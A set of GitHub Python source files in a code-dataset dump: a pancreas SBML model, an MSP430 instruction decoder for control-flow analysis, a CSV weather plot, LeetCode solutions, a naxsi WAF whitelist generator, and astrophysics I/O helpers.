(Cpa_lac-Cext_lac)/(1 dimensionless + Cext_lac/LACEX_Km + Cpa_lac/LACEX_Km)\",\n U.mmole_per_min,\n ),\n ),\n Reaction(\n sid=\"GLC2LAC\",\n name=\"glycolysis\",\n equation=\"Apa_glc -> 2 Apa_lac\"\n if species_in_amounts\n else \"Cpa_glc -> 2 Cpa_lac\",\n compartment=\"Vpa\",\n sboTerm=SBO.BIOCHEMICAL_REACTION,\n pars=[\n Parameter(\n \"GLC2LAC_Vmax\", 0.1, U.mmole_per_minl, name=\"Vmax glucose utilization (glycolysis)\",\n sboTerm=SBO.MAXIMAL_VELOCITY\n ),\n Parameter(\"GLC2LAC_Km\", 4.5, U.mM,\n name=\"Km effective glucose utilization (glycolysis)\", sboTerm=SBO.MICHAELIS_CONSTANT\n ),\n ],\n rules=[],\n formula=(\n \"Vpa * GLC2LAC_Vmax * (Cpa_glc/(Cpa_glc + GLC2LAC_Km))\",\n U.mmole_per_min,\n ),\n ),\n Reaction(\n sid=\"IRS\",\n name=\"IRS insulin secretion\",\n equation=\"-> Aext_ins + Aext_cpep [Apa_glc]\"\n if species_in_amounts\n else \"-> Cext_ins + Cext_cpep [Cpa_glc]\",\n compartment=\"Vmem\",\n sboTerm=SBO.TRANSPORT_REACTION,\n pars=[\n Parameter(\n \"IRS_Vmax\",\n 1.6e-6,\n U.mmole_per_minl, # 40/1000/60\n name=\"Vmax insulin secretion\",\n sboTerm=SBO.MAXIMAL_VELOCITY\n ),\n Parameter(\"IRS_n_glc\", 4, U.dimensionless,\n name=\"Hill coeffient glucose in insulin secretion\", sboTerm=SBO.HILL_COEFFICIENT),\n Parameter(\"IRS_Km_glc\", 7.0, U.mM,\n name=\"Km glucose insulin secretion\", sboTerm=SBO.MICHAELIS_CONSTANT),\n ],\n rules=[],\n formula=(\n \"Vpa * IRS_Vmax * power(Cpa_glc, IRS_n_glc) / \"\n \"(power(Cpa_glc, IRS_n_glc) + power(IRS_Km_glc, IRS_n_glc))\",\n U.mmole_per_min,\n ),\n notes=\"\"\"\n # Insulin secretion\n - equimolar secretion of insulin and c-peptide\n - hill kinetics of secretion depending on glucose\n \"\"\"\n ),\n]\n\nif not species_in_amounts:\n # replace species ids\n replacements = {\"Aext\": \"Cext\", \"Apa\": \"Cpa\"}\n for s in _m.species:\n sid_new = s.sid\n for key, value in replacements.items():\n sid_new = sid_new.replace(key, value)\n s.sid = sid_new\n s.hasOnlySubstanceUnits = False\n\npancreas_model = _m\n\n\ndef create_pancreas_model() -> FactoryResult:\n \"\"\"Creates minimal pancreas model\n\n :return: path to SBML file\n \"\"\"\n output_dir = Path(__file__).parent.parent.parent / \"models\" / f\"v{version}\"\n output_dir.mkdir(parents=True, exist_ok=True)\n\n results: FactoryResult = create_model(\n models=_m,\n output_dir=output_dir,\n annotations=None,\n create_report=True,\n )\n\n return results\n\n\nif __name__ == \"__main__\":\n results = create_pancreas_model()\n print(results.sbml_path)\n visualize_sbml(results.sbml_path)\n","repo_name":"matthiaskoenig/pancreas_minimal","sub_path":"panmin/model/pancreas_model.py","file_name":"pancreas_model.py","file_ext":"py","file_size_in_byte":9002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11087671987","text":"from scfmsp.controlflowanalysis.ExecutionPoint import ExecutionPoint\r\n\r\n\r\nclass AbstractInstruction:\r\n name = ''\r\n length = 2\r\n map1 = {}\r\n\r\n def __init__(self, function):\r\n self.file = ''\r\n self.program = function.program\r\n self.function = function\r\n\r\n self.address = 0\r\n self.length = 0\r\n self.clock = 0\r\n self.arguments = ()\r\n self.oplist = []\r\n \r\n self.register_mode = False\r\n self.indexed_mode = False\r\n self.indirect_mode = False\r\n self.immediate_mode = False\r\n self.dst_register_mode = False\r\n self.dst_indexed_mode = False\r\n\r\n self.immediate_dominator = None\r\n self.immediate_post_dominator = None\r\n self.predecessors = None\r\n\r\n self.__successors_checked_cache = None\r\n self.__execution_point = None\r\n\r\n def __unicode__(self):\r\n return '\"%s: %s %s\"' % (hex(self.address), self.name, self.arguments)\r\n\r\n\r\n def __repr__(self):\r\n return self.__unicode__()\r\n\r\n def parse(self, op_list):\r\n instr = ''\r\n self.oplist = op_list.split()\r\n temp = '{0:04b}'.format(int(self.oplist[0][0],16))\r\n temp1 = '{0:04b}'.format(int(self.oplist[0][3],16))\r\n temp2 = '{0:04b}'.format(int(self.oplist[0][2],16))\r\n # source addressing mode-----------------------------\r\n if (temp[2] == '0' and temp[3] == '0'):\r\n self.register_mode = True\r\n if (temp[2] == '0' and temp[3] == '1'):\r\n self.indexed_mode = True\r\n if (temp[2] == '1' and temp[3] == '0'):\r\n self.indirect_mode = True\r\n if(temp[2] == '1' and temp[3] == '1'):\r\n self.immediate_mode = True\r\n # destination addressing mode------------------\r\n if(temp[0] == '0'):\r\n self.dst_register_mode = True\r\n else:\r\n self.dst_indexed_mode = True\r\n\r\n # Instruction II (1 operand)-----------------------\r\n if (self.oplist[0][2] == '1'):\r\n arg1 = int(self.oplist[0][1],16)\r\n # Length of instructions and arguments ---------------\r\n if(self.register_mode):\r\n length = 1\r\n self.arguments = ('r'+str(arg1),)\r\n\r\n if(self.indirect_mode):\r\n length = 1\r\n self.arguments = ('r'+str(arg1),) \r\n\r\n if(self.indexed_mode):\r\n length = 2\r\n if(arg1 == 3):\r\n length = 1\r\n self.arguments = ('r'+str(arg1),) \r\n\r\n if(self.immediate_mode):\r\n if (self.oplist[0][1] == '0'):\r\n length = 2\r\n self.arguments = ('#'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],) \r\n else:\r\n length = 1\r\n self.arguments = ('r'+str(arg1),)\r\n # Instruction types II------------------------------------------\r\n if (temp1[2]=='0' and temp1[3]=='0' and temp[0]=='0'):\r\n if (temp[1] == '1'):\r\n instr = 'rrc.b'\r\n else:\r\n instr = 'rrc'\r\n if (temp1[2]=='0' and temp1[3]=='0' and temp[0]=='1'):\r\n instr = 'swpb'\r\n if (temp1[2]=='0' and temp1[3]=='1' and temp[0]=='0'):\r\n instr = 'rra'\r\n if (temp1[2]=='0' and temp1[3]=='1' and temp[0]=='1'):\r\n instr = 'sxt'\r\n if (temp1[2]=='1' and temp1[3]=='0' and temp[0]=='0'):\r\n instr = 'push'\r\n if (temp1[2]=='1' and temp1[3]=='0' and temp[0]=='1'):\r\n instr = 'call'\r\n if (temp1[2]=='1' and temp1[3]=='1' and temp[0]=='0'):\r\n instr = 'reti' \r\n\r\n\r\n # Instruction III-----------------------------------\r\n elif (self.oplist[0][2] == '2' or self.oplist[0][2] == '3'):\r\n # Length of instruction\r\n length = 1\r\n self.clock = 2\r\n # Instruction III\r\n if (temp2[3]=='0' and temp1[0]=='0' and temp1[1]=='0'):\r\n instr = 'jnz'\r\n if (temp2[3]=='0' and temp1[0]=='0' and temp1[1]=='1'):\r\n instr = 'jz'\r\n if (temp2[3]=='0' and temp1[0]=='1' and temp1[1]=='0'):\r\n instr = 'jnc'\r\n if (temp2[3]=='0' and temp1[0]=='1' and temp1[1]=='1'):\r\n instr = 'jc'\r\n if (temp2[3]=='1' and temp1[0]=='0' and temp1[1]=='0'):\r\n instr = 'jn'\r\n if (temp2[3]=='1' and temp1[0]=='0' and temp1[1]=='1'):\r\n instr = 'jge'\r\n if (temp2[3]=='1' and temp1[0]=='1' and temp1[1]=='0'):\r\n instr = 'jl'\r\n if (temp2[3]=='1' and temp1[0]=='1' and temp1[1]=='1'):\r\n instr = 'jmp'\r\n\r\n\r\n # Instruction I ------------------------------------\r\n else:\r\n arg1 = int(self.oplist[0][3],16)\r\n arg2 = int(self.oplist[0][1],16)\r\n # Length of instruction & arguments\r\n if(self.register_mode and self.dst_register_mode):\r\n length = 1\r\n self.clock = 1\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.register_mode and self.dst_indexed_mode):\r\n length = 2\r\n self.clock = 4\r\n if(arg2 == 2):\r\n self.arguments = ('r'+str(arg1),'&'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],)\r\n else:\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.indexed_mode and self.dst_register_mode):\r\n length = 2\r\n if (self.oplist[0][3] == '3'): # constant generator -------------\r\n length = 1\r\n self.clock = 1\r\n else:\r\n self.clock = 3\r\n if(arg1 == 2):\r\n self.arguments = ('&'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],'r'+str(arg2),)\r\n else:\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),) \r\n if(self.indexed_mode and self.dst_indexed_mode):\r\n length = 3\r\n self.clock = 6\r\n if (self.oplist[0][3] == '3'): # constant generator -------------\r\n length = 2\r\n self.clock = 4 \r\n if(arg1 == 2): \r\n self.arguments = ('&'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],'&'+self.oplist[0][10]+self.oplist[0][11]+self.oplist[0][8]+self.oplist[0][9],)\r\n else:\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n \r\n if(self.indirect_mode and self.dst_register_mode):\r\n length = 1\r\n if (self.oplist[0][3] == '2' or self.oplist[0][3] == '3'): # constant generator -------------\r\n self.clock = 1\r\n else:\r\n self.clock = 2\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.indirect_mode and self.dst_indexed_mode):\r\n length = 2\r\n if (self.oplist[0][3] == '2' or self.oplist[0][3] == '3'): # constant generator -------------\r\n self.clock = 4\r\n else:\r\n self.clock = 5\r\n if(arg2 == 2):\r\n self.arguments = ('r'+str(arg1),'&'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],)\r\n else:\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.immediate_mode and self.dst_register_mode):\r\n if (self.oplist[0][3] == '0'): #-----##------\r\n length = 2\r\n self.clock = 2\r\n self.arguments = ('#'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],'r'+str(arg2),)\r\n else:# indirect autoincrement -------------------\r\n length = 1\r\n if (self.oplist[0][3] == '2' or self.oplist[0][3] == '3'): # constant generator -------------\r\n self.clock = 1\r\n else:\r\n self.clock = 2\r\n self.arguments = ('r'+str(arg1),'r'+str(arg2),)\r\n\r\n if(self.immediate_mode and self.dst_indexed_mode):\r\n if (self.oplist[0][3] == '0'):#-----#------\r\n length = 3\r\n self.clock = 5\r\n self.arguments = ('#'+self.oplist[0][6]+self.oplist[0][7]+self.oplist[0][4]+self.oplist[0][5],'r'+str(arg2),)\r\n else:# indirect autoincrement -----------------------------\r\n length = 2\r\n if (self.oplist[0][3] == '2' or self.oplist[0][3] == '3'): # constant generator -------------\r\n self.clock = 4\r\n else:\r\n self.clock = 5\r\n self.arguments = ('r'+str(arg1),'r'+str(arg1),)\r\n\r\n # Instruction type I --------------------------------------------------------------------------------------------------------------------\r\n if (self.oplist[0][2] == '4'):\r\n if (temp[1] == '1'):\r\n instr = 'mov.b'\r\n else:\r\n instr = 'mov'\r\n if (self.oplist[0][2] == '5'):\r\n if (temp[1] == '1'):\r\n instr = 'add.b'\r\n else:\r\n instr = 'add'\r\n if (self.oplist[0][2] == '6'):\r\n if (temp[1] == '1'):\r\n instr = 'addc.b'\r\n else:\r\n instr = 'addc'\r\n if (self.oplist[0][2] == '7'):\r\n if (temp[1] == '1'):\r\n instr = 'subc.b'\r\n else:\r\n instr = 'subc'\r\n if (self.oplist[0][2] == '8'):\r\n if (temp[1] == '1'):\r\n instr = 'sub.b'\r\n else:\r\n instr = 'sub'\r\n if (self.oplist[0][2] == '9'):\r\n if (temp[1] == '1'):\r\n instr = 'cmp.b'\r\n else:\r\n instr = 'cmp' \r\n if (self.oplist[0][2] == 'a'):\r\n if (temp[1] == '1'):\r\n instr = 'dadd.b'\r\n else:\r\n instr = 'dadd'\r\n if (self.oplist[0][2] == 'b'):\r\n if (temp[1] == '1'):\r\n instr = 'bit.b'\r\n else:\r\n instr = 'bit'\r\n if (self.oplist[0][2] == 'c'):\r\n if (temp[1] == '1'):\r\n instr = 'bic.b'\r\n else:\r\n instr = 'bic'\r\n if (self.oplist[0][2] == 'd'):\r\n if (temp[1] == '1'):\r\n instr = 'bis.b'\r\n else:\r\n instr = 'bis'\r\n if (self.oplist[0][2] == 'e'):\r\n if (temp[1] == '1'):\r\n instr = 'xor.b'\r\n else:\r\n instr = 'xor'\r\n if (self.oplist[0][2] == 'f'):\r\n if (temp[1] == '1'):\r\n instr = 'and.b'\r\n else:\r\n instr = 'and'\r\n\r\n return instr, length, self.arguments, self.clock, self.register_mode, self.indexed_mode, self.immediate_mode, self.indirect_mode, self.dst_register_mode, self.dst_indexed_mode\r\n \r\n def get_info(self, length, address, arguments, clock, oplist, register, index, immediate, indirect, dst_register, dst_index, file):\r\n self.length = length\r\n self.address = address\r\n self.arguments = arguments\r\n self.clock = clock\r\n self.oplist = oplist\r\n self.register_mode = register\r\n self.indexed_mode = index\r\n self.immediate_mode = immediate\r\n self.indirect_mode = indirect\r\n self.dst_indexed_mode = dst_index\r\n self.dst_register_mode = dst_register\r\n self.file = file\r\n\r\n def get_execution_point(self):\r\n if self.__execution_point is None:\r\n self.__execution_point = ExecutionPoint(self.function.name, self.address, self.function.caller)\r\n return self.__execution_point\r\n\r\n def get_successors(self): \r\n return [self.get_execution_point().forward(self.length*2)]\r\n\r\n def get_successors_checked(self):\r\n if self.__successors_checked_cache is not None:\r\n return self.__successors_checked_cache\r\n successors = self.get_successors()\r\n ret = []\r\n for succ in successors:\r\n try:\r\n self.program.get_instruction_at_execution_point(succ)\r\n ret.append(succ)\r\n except:\r\n pass\r\n self.__successors_checked_cache = ret\r\n return ret\r\n\r\n def get_execution_time(self):\r\n pass\r\n\r\n def get_branching_time(self):\r\n return 2\r\n\r\n def get_region_then(self):\r\n return []\r\n\r\n def get_region_else(self):\r\n return []\r\n\r\n def _get_branchtime(self, region):\r\n ret = 0\r\n for ep in region:\r\n instr = self.program.get_instruction_at_execution_point(ep)\r\n ret += instr.get_execution_time()\r\n \r\n if not (ep == self.get_execution_point()):\r\n ret -= instr.get_branchtime_then() \r\n return ret\r\n\r\n def get_branchtime_then(self):\r\n return self._get_branchtime(self.get_region_then())\r\n\r\n def get_branchtime_else(self):\r\n return self._get_branchtime(self.get_region_else())\r\n\r\n def get_junction(self):\r\n return None\r\n\r\n def execute_judgment(self, ac):\r\n raise NotImplementedError('Instruction \"%s\" is lacking an execute_judgment implementation! At %s' %\r\n (self.name, self.get_execution_point()))\r\n\r\n","repo_name":"sepidehpouyan/SCF-MSP430","sub_path":"scfmsp/controlflowanalysis/AbstractInstruction.py","file_name":"AbstractInstruction.py","file_ext":"py","file_size_in_byte":14090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"33598248431","text":"import csv\n\nopen_file = open(\"sitka_weather_07-2018_simple.csv\",\"r\")\n\ncsv_file = csv.reader(open_file, delimiter=\",\") # delimiter means the column separate by \",\"\n\nheader_row = next(csv_file ) # skip the first record on first row which is the header\n\n#The enumerate() function returns both the index of each item and the value of each \n#item as you loop through a list.\n# go to the first header line, the header row & tell the position of station/name/date... \n# show the index value of each loclation in the header\n\nfor index, column_header in enumerate(header_row):\n print(\"Index:\", index, \"Column Name:\", column_header)\n\nhighs = []\n\nfor row in csv_file:\n highs.append(int(row[5]))\n\n# print(highs)\n\n# plot highs on a chart\n\nimport matplotlib.pyplot as plt\n\nplt.plot(highs, c = \"red\")\nplt.title(\"Daily high temperatures, July 2018\", fontsize = 16)\nplt.xlabel(\"\",fontsize = 16)\nplt.ylabel(\"Temperature(F)\", fontsize = 16)\nplt.tick_params(axis=\"both\", which=\"major\", labelsize = 16)\n\n\nplt.show()\n","repo_name":"Rurudo-9/CSV_Project","sub_path":"sitka_1.py","file_name":"sitka_1.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18202867242","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n stack = []\n\n for str in path.split('/'):\n if str in ('', '.'):\n continue\n if str == '..':\n if stack:\n stack.pop()\n else:\n stack.append(str)\n\n return '/' + '/'.join(stack)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0071. Simplify Path/0071.py","file_name":"0071.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"14011995192","text":"import pprint\nimport logging\n\nclass NxWhitelistExtractor:\n def __init__(self, cursor, rules_file, pages_hit=10, rules_hit=20, exlog_max=5):\n self.wrapper = cursor\n self.rules_list = []\n self.final_rules = []\n self.base_rules = []\n self.pages_hit = pages_hit\n self.rules_hit = rules_hit\n self.core_msg = {}\n self.extract_core(rules_file)\n self.exlog_max = exlog_max\n \n def extract_core(self, rules_file):\n try:\n fd = open(rules_file, 'r')\n for i in fd:\n if i.startswith('MainRule') or i.startswith('#@MainRule'):\n pos = i.find('id:')\n pos_msg = i.find('msg:')\n self.core_msg[i[pos + 3:i[pos + 3].find(';') - 1]] = i[pos_msg + 4:][:i[pos_msg + 4:].find('\"')]\n fd.close()\n except:\n logging.warning(\"Unable to open rules file :\"+rules_file)\n pass\n\n def gen_basic_rules(self,url=None, srcip=None, dsthost=None,\n rule_id=None, exception_md5=None,\n exception_id=None):\n\n tmp_rules = []\n self.base_rules = self.rules_list[:]\n\n def transform_to_dict(self, l):\n d = {}\n for i in l:\n if not d.has_key(i[0]):\n d[i[0]] = []\n d[i[0]].append(i[1])\n #elimininate duplicate ids in each value\n for i in d:\n d[i] = list(set(d[i]))\n return d\n\n def opti_rules_back(self):\n \"\"\" Perform a serie of predefined SELECTs to \n find possible whitelist factorisations \"\"\"\n # rules of requests extracting optimized whitelists, from \n # more restrictive to less restrictive.\n opti_select_DESC = [\n (\"select count(*) as ct, e.rule_id, e.zone, e.var_name, u.url,\"\n \"count(distinct c.peer_ip) as peer_count,\"\n \"(select count(distinct peer_ip) from connections) as ptot,\"\n \"(select count(*) from connections) as tot from exceptions as e \"\n \"JOIN connections as c ON c.id_exception = e.exception_id \"\n \"JOIN urls as u ON c.url_id = u.url_id \"\n \"GROUP BY u.url, e.var_name,e.zone, e.rule_id \"\n \"HAVING (ct) > ((select count(*) from connections)/1000);\"),\n # select on var_name+zone+rule_id (unpredictable URL) \n (\"select count(*) as ct, e.rule_id, e.zone, e.var_name, '' as url, count(distinct c.peer_ip) as peer_count, \"\n \"(select count(distinct peer_ip) from connections) as ptot, \"\n \"(select count(*) from connections) as tot \"\n \"from exceptions as e JOIN connections as c ON c.id_exception = e.exception_id \"\n \"JOIN urls as u ON c.url_id = u.url_id \"\n \"GROUP BY e.var_name,e.zone, e.rule_id HAVING (ct) > \"\n \"((select count(*) from connections)/1000)\"),\n # select on zone+url+rule_id (unpredictable arg_name) \n (\"select count(*) as ct, e.rule_id, e.zone, '' as var_name, u.url, count(distinct c.peer_ip) as peer_count, \"\n \"(select count(distinct peer_ip) from connections) as ptot, \"\n \"(select count(*) from connections) as tot \"\n \"from exceptions as e JOIN connections as c ON c.id_exception = e.exception_id \"\n \"JOIN urls as u ON c.url_id = u.url_id \"\n \"GROUP BY u.url, \"\n \"e.zone, e.rule_id HAVING (ct) > ((select count(*) from connections)/1000)\"),\n # select on zone+rule_id (mostly because of ARGS|NAME containing ie '[foo]')\n (\"select count(*) as ct, e.rule_id, e.zone, '' as var_name, '' as url, count(distinct c.peer_ip) as peer_count, \"\n \"(select count(distinct peer_ip) from connections) as ptot, \"\n \"(select count(*) from connections) as tot from exceptions as e, \"\n \"connections as c where c.id_exception = \"\n \"e.exception_id GROUP BY e.zone, e.rule_id HAVING (ct) > \"\n \"((select count(*) from connections)/1000);\"),\n # select on zone+url+var_name (unpredictable id)\n (\"select count(*) as ct, 0 as rule_id, e.zone, e.var_name, u.url, count(distinct c.peer_ip) as peer_count, \"\n \"(select count(distinct peer_ip) from connections) as ptot, \"\n \"(select count(*) from connections) as tot \"\n \"from exceptions as e JOIN connections as c ON c.id_exception = e.exception_id\"\n \" JOIN urls as u ON c.url_id = u.url_id\"\n \" GROUP BY u.url, \"\n \"e.zone, e.var_name HAVING (ct) > tot/1000\")\n ]\n for req in opti_select_DESC:\n res = self.wrapper.execute(req)\n# res = self.wrapper.getResults()\n for r in res:\n if len(r['var_name']) > 0:\n self.try_append({'url': r['url'], 'rule_id': r['rule_id'], 'zone': r['zone'], 'var_name': r['var_name'], \n 'hcount': r['ct'], 'htotal': r['tot'], 'pcount':r['peer_count'], 'ptotal':r['ptot'],\n 'pratio': round((r['peer_count'] / float(r['ptot'])) * 100,2),\n 'hratio': round((r['ct'] / float(r['tot'])) * 100,2)\n })\n else:\n self.try_append({'url': r['url'], 'rule_id': r['rule_id'], 'zone': r['zone'], 'var_name': '', \n 'hcount': r['ct'], 'htotal': r['tot'], 'ptotal':r['ptot'],\n 'pratio': round((r['peer_count'] / float(r['ptot'])) * 100,2),\n 'hratio': round((r['ct'] / float(r['tot'])) * 100,2),\n 'pcount':r['peer_count']})\n return self.base_rules, self.final_rules\n\n def try_append(self, target, delmatch=False):\n# print \"ruules\"+str(self.pages_hit)\n \"\"\"returns true if whitelist 'target' is already handled by final_rules\n does a dummy comparison and compares the counters\"\"\"\n count=0\n nb_rule=0\n uurl = set()\n \n for z in self.final_rules[:]:\n if len(target['url']) > 0 and len(z['url']) > 0 and target['url'] != z['url']:\n continue\n if target['rule_id'] != 0 and z['rule_id'] != 0 and target['rule_id'] != z['rule_id']:\n continue\n if len(target['zone']) > 0 and len(z['zone']) > 0 and target['zone'] != z['zone']:\n continue\n if len(target['var_name']) > 0 and len(z['var_name']) > 0 and target['var_name'] != z['var_name']:\n continue\n uurl.add(z['url'])\n if delmatch is True:\n self.final_rules.remove(z)\n else:\n nb_rule += 1\n count += int(z['hcount'])\n if delmatch is True:\n return\n # No rules are matching this one, append.\n if not count and not nb_rule:\n self.final_rules.append(target)\n # There is already existing rules that seem to cover this one.\n # As rules are generated from stricter (url+zone+var_name+id) to lousier one (ie. id)\n # Check if it's worth replacing those.\n # Check the number of unique URLs covered by the rule\n if target['hcount'] >= count and len(uurl) > self.pages_hit:\n self.try_append(target, True)\n self.final_rules.append(target)\n return\n # Check the number of unique IDs covered by the rule\n #if (target['hcount'] > count+1) or (target['hcount'] >= count and nb_rule > self.rules_hit):\n if (target['hcount'] >= count and nb_rule > self.rules_hit):\n self.try_append(target, True)\n self.final_rules.append(target)\n return\n \n def lookup_exlog(self, rule):\n \"\"\"Lookup into DB if we can find an exception \n that fits the criterias, and has a content (from EXLOG)\"\"\"\n first = True\n args = []\n append = \"\"\n find_back = (\"select e.rule_id, e.zone, e.var_name, u.url, e.content \"\n \"from exceptions as e, urls as u, connections as c where \"\n \"c.url_id = u.url_id and c.id_exception = e.exception_id \"\n \" AND length(e.content) > 0 GROUP BY u.url, e.var_name, e.zone, e.rule_id\")\n # If rule_id is present, match it.\n if rule['rule_id'] != 0:\n append += \"e.rule_id == ?\"\n args.append(str(rule['rule_id']))\n first = False\n # same goes for zone\n if len(rule['zone']) > 0:\n if first is False:\n append += \" AND \"\n append += \"e.zone == ?\"\n args.append(rule['zone'])\n first = False\n # and url\n if len(rule['url']) > 0:\n if first is False:\n append += \" AND \"\n append += \"u.url == ?\"\n args.append(rule['url'])\n first = False\n # and finally, var_name\n if len(rule['var_name']) > 0:\n if first is False:\n append += \" AND \"\n append += \"e.var_name == ?\"\n args.append(rule['var_name'])\n first = False\n \n if first is False:\n req = find_back+\" HAVING \"+append\n res = self.wrapper.execute(req, tuple(args))\n# res = self.wrapper.getResults()\n return res\n \n def format_rules_output(self, opti_rules):\n r = '########### Optimized Rules Suggestion ##################\\n'\n if not len(opti_rules):\n r+= \"#No rules to be generated\\n\"\n return\n opti_rules.sort(key=lambda k: (k['hratio'], k['pratio']))\n _i = len(opti_rules)-1\n while _i >= 0:\n exlog_count = 0\n i = opti_rules[_i]\n _i = _i - 1\n r += (\"# total_count:\"+str(i['hcount'])+\" (\"+str(i['hratio'])+\n \"%), peer_count:\"+str(i['pcount'])+\" (\"+str(i['pratio'])+\"%)\")\n r += \" | \"+self.core_msg.get(str(i['rule_id']), \"?\")+\"\\n\"\n res = self.lookup_exlog(i)\n for exlog in res:\n r += \"#exemple (from exlog) : '\"+str(res[4][0][4])+\"'\\n\"\n exlog_count += 1\n if exlog_count > self.exlog_max:\n break\n if (i['hratio'] < 5 and i['pratio'] < 5) or (i['pratio'] < 5):\n r += '#'\n r += 'BasicRule wl:' + str(i['rule_id']) + ' \"mz:'\n if i['url'] is not None and len(i['url']) > 0:\n r += '$URL:' + i['url']\n if i['rule_id'] == 1 and i['zone'] == \"REQUEST\":\n r += '\";\\n'\n continue\n if i['zone'] is not None and len(i['zone']) > 0:\n if i['url']:\n r += '|'\n if \"FILE_EXT\" in i['zone'] and i['var_name'] is not None and len(i['var_name']) > 0:\n i['zone'] = i['zone'].replace(\"FILE_EXT\", \"BODY\")\n if i['var_name'] is None:\n i['var_name'] = ''\n i['var_name'] = i['var_name']+\"|FILE_EXT\"\n if \"|NAME\" in i['zone'] and i['var_name'] is not None and len(i['var_name']) > 0:\n i['zone'] = i['zone'].replace(\"|NAME\", \"\")\n if i['var_name'] is None:\n i['var_name'] = ''\n i['var_name'] = i['var_name']+\"|NAME\"\n r += i['zone']\n if i['var_name'] is not None and len(i['var_name']) > 0:\n r = r[:-len(i['zone'])]+\"$\"+r[-len(i['zone']):]\n r += \"_VAR:\"+i['var_name']\n r += '\";\\n' \n return r\n","repo_name":"NeusoftSecurity/SEnginx","sub_path":"3rd-party/naxsi/nx_util/nx_lib/nx_whitelists.py","file_name":"nx_whitelists.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"21"} +{"seq_id":"13899001656","text":"import numpy as np\n\nfilename = '../observations/HX_pixelvalues.txt'\n\n\ndef load_obs_fromtxt(filename, gstar_jitter=0.5, region='',\n line_jitter=[0.1, 0.5, 0.5], line_mask=None):\n\n cols = [('x', np.int), ('y', np.int), ('region', 'S50'),\n ('line_intensity', np.float, 3), ('line_unc', np.float, 3),\n ('line_mask', np.bool, 3),\n ('FIR', np.float), ('FIR_unc', np.float),\n ('Gstar', np.float), ('Gstar_unc', np.float)]\n\n dat = np.loadtxt(filename, skiprows=2)\n npix = dat.shape[0]\n obs = np.zeros(npix, dtype=np.dtype(cols))\n\n obs['x'] = dat[:, 0]\n obs['y'] = dat[:, 1]\n obs['region'] = region\n lines = np.array([dat[:, 5], dat[:, 7], dat[:, 9]]).T # W/m^2/sr\n obs['line_intensity'] = lines\n obs['FIR'][:] = dat[:, 3] # W/m^2/sr\n obs['FIR_unc'] = dat[:, 4]\n obs['Gstar'] = dat[:, 2] # Habings\n obs['Gstar_unc'] = obs['Gstar'] * gstar_jitter\n\n obs['line_unc'] = np.array([dat[:, 6], dat[:, 8], dat[:, 10]]).T\n extra_variance = (np.array(line_jitter) * obs['line_intensity'])**2\n obs['line_unc'] = np.sqrt(obs['line_unc']**2 + extra_variance)\n\n # Mask lines to ignore in the fits. 1 = fit, 0 = not fit.\n # Order is CII, OI63, OI145\n if line_mask is None:\n obs['line_mask'] = (dat[:, -3:]) # LYNN\n else:\n obs['line_mask'][:] = line_mask\n\n return obs\n\n\ndef load_observations_fromfits(files, fields):\n return obs_structured_array\n\n\ndef write_dict(incat, outname='out.dat', csv=False, transpose=False):\n \"\"\"Write a dictionary or Numpy structured array to an ascii file,\n either space delimited or CSV.\n\n :param incat:\n The catalog to write out, either a dictionary or a numpy\n structured array. If a dictionary, it is assumed that the\n length of the value in each key:value pair is the same.\n\n :param outname:\n String giving the name of of the to which the output will be\n written.\n\n :param csv: If ``True`` the output file is CSV. If ``False`` the\n output file is space delimited.\n \"\"\"\n try:\n # input is a dictionary\n colnames = incat.keys()\n except AttributeError:\n # input is a numpy structured array\n colnames = incat.dtype.names\n\n # Transpose arrays\n if transpose:\n for col in colnames:\n incat[col] = list(np.array(incat[col]).T)\n\n ncol = len(colnames)\n nrow = len(incat[colnames[0]])\n # Assert each column has the same number of rows and build the\n # header\n hdr = []\n for c in colnames:\n assert len(incat[c]) == nrow\n hdr += np.size(incat[c][0]) * ['{}'.format(c)]\n\n # Open file and write header\n out = open(outname, 'w')\n out.write('# ')\n if csv:\n out.write(','.join(hdr))\n formatstring = (len(hdr)-1) * '{},' + '{}\\n'\n else:\n out.write(' '.join(hdr))\n formatstring = len(hdr) * '{} ' + '\\n'\n out.write('\\n')\n\n for irow in range(nrow):\n vals = []\n for col in colnames:\n print(col, incat[col][irow])\n vals += list(np.atleast_1d(incat[col][irow]))\n out.write(formatstring.format(*vals))\n out.close()\n","repo_name":"bd-j/pdrfit","sub_path":"pdrfit/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18203238462","text":"class Solution:\n def sortedListToBST(self, head: Optional[ListNode]) -> Optional[TreeNode]:\n def helper(l: int, r: int) -> Optional[TreeNode]:\n nonlocal head\n if l > r:\n return None\n\n m = (l + r) // 2\n\n # Simulate inorder traversal: recursively form the left half\n left = helper(l, m - 1)\n\n # Once left half is traversed, process the current node\n root = TreeNode(head.val)\n root.left = left\n\n # Maintain the invariance\n head = head.next\n\n # Simulate inorder traversal: recursively form the right half\n root.right = helper(m + 1, r)\n return 